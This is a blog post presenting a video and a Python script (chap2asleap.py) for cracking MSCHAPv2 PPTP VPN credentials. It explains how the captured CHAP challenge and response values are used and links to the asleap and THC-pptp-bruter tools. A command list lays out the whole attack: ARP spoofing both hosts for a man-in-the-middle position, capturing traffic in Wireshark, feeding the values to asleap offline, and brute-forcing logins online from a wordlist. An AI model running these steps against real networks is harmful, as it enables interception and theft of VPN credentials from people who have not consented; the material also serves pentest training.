chap2asleap.py (v0.1.1) + Cracking VPN (Asleap + THC-pptp-bruter)

A python script, to automatically generate the arguments for Joshua Wright's 'asleap' program.

This video demostrates an offline (asleap) and online (THC-pptp-bruter) attack on MSCHAP v2 software VPN.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/asleap___THC-pptp-bruter.mp4

Method

From wireshark (and a Man In The Middle attack), you can get "CHAP Challenge" and "CHAP Response". We can break theses values down:

CHAP Challenge = Auth Challenge (16 bytes)

CHAP Response = Peer Challenge (16 bytes) and Peer Response (24 bytes)

After finding "Auth Challenge and Peer Challenge" we can add these to the username and hash (sha1) the result. This will generate the "Challenge".

Once we have the challenge, we can feed this into the asleap, along with CHAP Challenge.

This script does all the work for you (and more), it just needs the values from wireshark for it to work. As well as having the option for different styles of attack, you can either uses a dictionary/wordlist or use 'Genkeys' to generate a look up file for asleap (which is recommended). Also by using this, you can automatically run asleap with your arguments.

Tools

  • asleap
  • Python
  • The script - chap2asleap.py
  • Wireshark
  • VPN
  • THC-pptp-bruter

Software

Name: asleap

Version: 2.2

Home Page: http://www.willhackforsushi.com/Asleap.html

Download Link: http://www.willhackforsushi.com/code/asleap/2.2/asleap-2.2.tgz


Name: THC-pptp-bruter

Version: 0.1.4

Home Page: http://freeworld.thc.org

Download Link: http://freeworld.thc.org/download.php?t=r&f=thc-pptp-bruter-0.1.4.tar.gz


Name: chap2asleap.py

Version: 0.1.1

Home Page: https://blog.g0tmi1k.com/

Download Link: [http://github.com/g0tmi1k/[99]]]99

How to use chap2asleap.py

  1. chmod 755 chap2asleap.py
  2. python chap2asleap.py

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth1 -t 10.0.0.3 10.0.0.9

arpspoof -i eth1 -t 10.0.0.9 10.0.0.3

wireshark -i eth1 -k

python chap2asleap.py
python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v

cd /pentest/passwords/wordlists.lst
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3

Notes

Song: Two Fingers - Keman Rhythm

Video length: 03:03

Capture length: 5:48

Blog Post: https://blog.g0tmi1k.com/2010/03/chap2asleappy-v011-vpn/

Changelog

2011-04-05 - v0.2

  • [>] Updated